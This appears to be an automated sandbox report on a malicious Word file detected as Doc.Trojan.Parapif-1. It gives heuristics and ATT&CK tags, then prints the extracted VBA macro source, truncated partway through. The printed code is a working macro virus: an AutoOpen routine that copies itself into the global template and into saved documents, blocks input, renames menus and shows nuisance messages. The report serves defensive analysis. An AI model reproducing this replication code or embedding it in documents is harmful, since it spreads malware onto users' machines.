MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro detected by ClamAV as 'Doc.Trojan.Parapif-1'. The macro is named 'AutoOpen' and attempts to copy itself, potentially to achieve persistence or spread. The document body text is in Chinese and attempts to disguise the malicious nature by claiming to be a harmless virus, which is a common social engineering tactic.
Heuristics 4
-
ClamAV: Doc.Trojan.Parapif-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Parapif-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11765 bytes |
SHA-256: a04bdf5195f35ce792db2cedfb3169454fcdc4026f476e610abb0927dc40edfb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim A
Dim B
Dim IQ
Dim aa
Dim s
Dim a_$
Dim am$
Dim IQ1
Dim aaa
Dim ss
Dim d
On Error Resume Next
WordBasic.DisableInput 1
A = 4
B = 2
IQ = WordBasic.CountMacros(0)
If IQ > 0 Then
For aa = 1 To IQ
If WordBasic.[MacroName$](aa, 0) = "AutoOpen" Then
s = 1
End If
Next aa
End If
a_$ = WordBasic.[FileName$]()
am$ = a_$ + ":AutoOpen"
If s <> 1 Then
WordBasic.MacroCopy am$, "AutoOpen", -1
End If
IQ1 = WordBasic.CountMacros(1)
If IQ1 > 0 Then
For aaa = 1 To IQ1
If WordBasic.[MacroName$](aaa, 1) = "AutoOpen" Then
ss = 1
End If
Next aaa
End If
If ss <> 1 Then
WordBasic.FileSaveAs Format:=A * 1 / B / B
WordBasic.MacroCopy "AutoOpen", am$, -1
End If
If WordBasic.Day(WordBasic.Now()) <= WordBasic.Int(Rnd() * 30) + 1 Then GoTo bye
WordBasic.FileNew
WordBasic.FormatFont Points:=30, Color:=1, Bold:=1
WordBasic.CenterPara
WordBasic.Insert "??!!??!!?????????????,"
WordBasic.InsertPara
WordBasic.Insert "??[?????--PART--5]!!"
For d = 1 To 10000
Next d
menu
exit_:
WordBasic.FileNew
WordBasic.CenterPara
WordBasic.FormatFont Points:=30, Underline:=1, Color:=2, Bold:=1
WordBasic.Insert "????????, ???????, ????????, sorry !! ???shift? , ??? ?? / ???? ??!!"
bye:
End Sub
Private Sub menu()
On Error Resume Next
WordBasic.RenameMenu "??", "????(F)", 0
WordBasic.RenameMenu "??", "????(E)", 0
WordBasic.RenameMenu "??", "????(V)", 0
WordBasic.RenameMenu "??", "????(I)", 0
WordBasic.RenameMenu "??", "(O)???", 0
WordBasic.RenameMenu "??", "?????(T)", 0
WordBasic.RenameMenu "??", "(A)???", 0
WordBasic.RenameMenu "??", "?????(W)", 0
WordBasic.RenameMenu "??", "????(H)", 0
bye:
qu
End Sub
Private Sub qu()
Dim c
Dim x
Dim timer_
Dim d
Dim y
WordBasic.DisableInput 1
On Error Resume Next
WordBasic.Beep
WordBasic.MsgBox "? ? ? [ ? ? ? ? ? , ? ? ? ? ] !! ? ? ? ? ? ? ? ? ? , ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ", " ? ? ? ? ? ? ? ?------PART 5------ ", 32
WordBasic.Beep
WordBasic.MsgBox "? ? ? ? ? , ? ? ? ? ? !! ? ? ? ? ? , ? ? ? ? ? !! ? ? ? ? ? ? , ? ? ? ? ? , ? ? ? ? ? ? !! ? ? ? ? ? ? ?!! ", " ? ? ? ? ? ? ? ?------PART 5------ ", 32
GoTo FF
FF:
WordBasic.FileNew
WordBasic.CenterPara
WordBasic.FormatFont Points:=48, Color:=2, Bold:=1
WordBasic.CenterPara
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert ","
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FormatFont Points:=48, Color:=6, Bold:=1
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert ","
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 4000
Next c
WordBasic.FormatFont Points:=48, Underline:=1, Color:=1, Bold:=1
WordBasic.Insert "?"
For c = 1 To 4000
Next c
WordBasic.Insert "?"
For x = 1 To 20
WordBasic.Beep
For timer_ = 1 To 1000
Next timer_
Next x
GoTo FFF
FFF:
WordBasic.FileNew
WordBasic.CenterPara
WordBasic.FormatFont Points:=30, Color:=6, Bold:=1
WordBasic.Insert "?"
For c = 1 To 4000
Next c
WordBasic.FormatFont Points:=30, Color:=1, Bold:=1
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert "?"
For c = 1 To 2500
Next c
WordBasic.Insert ","
For c = 1 To 2500
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.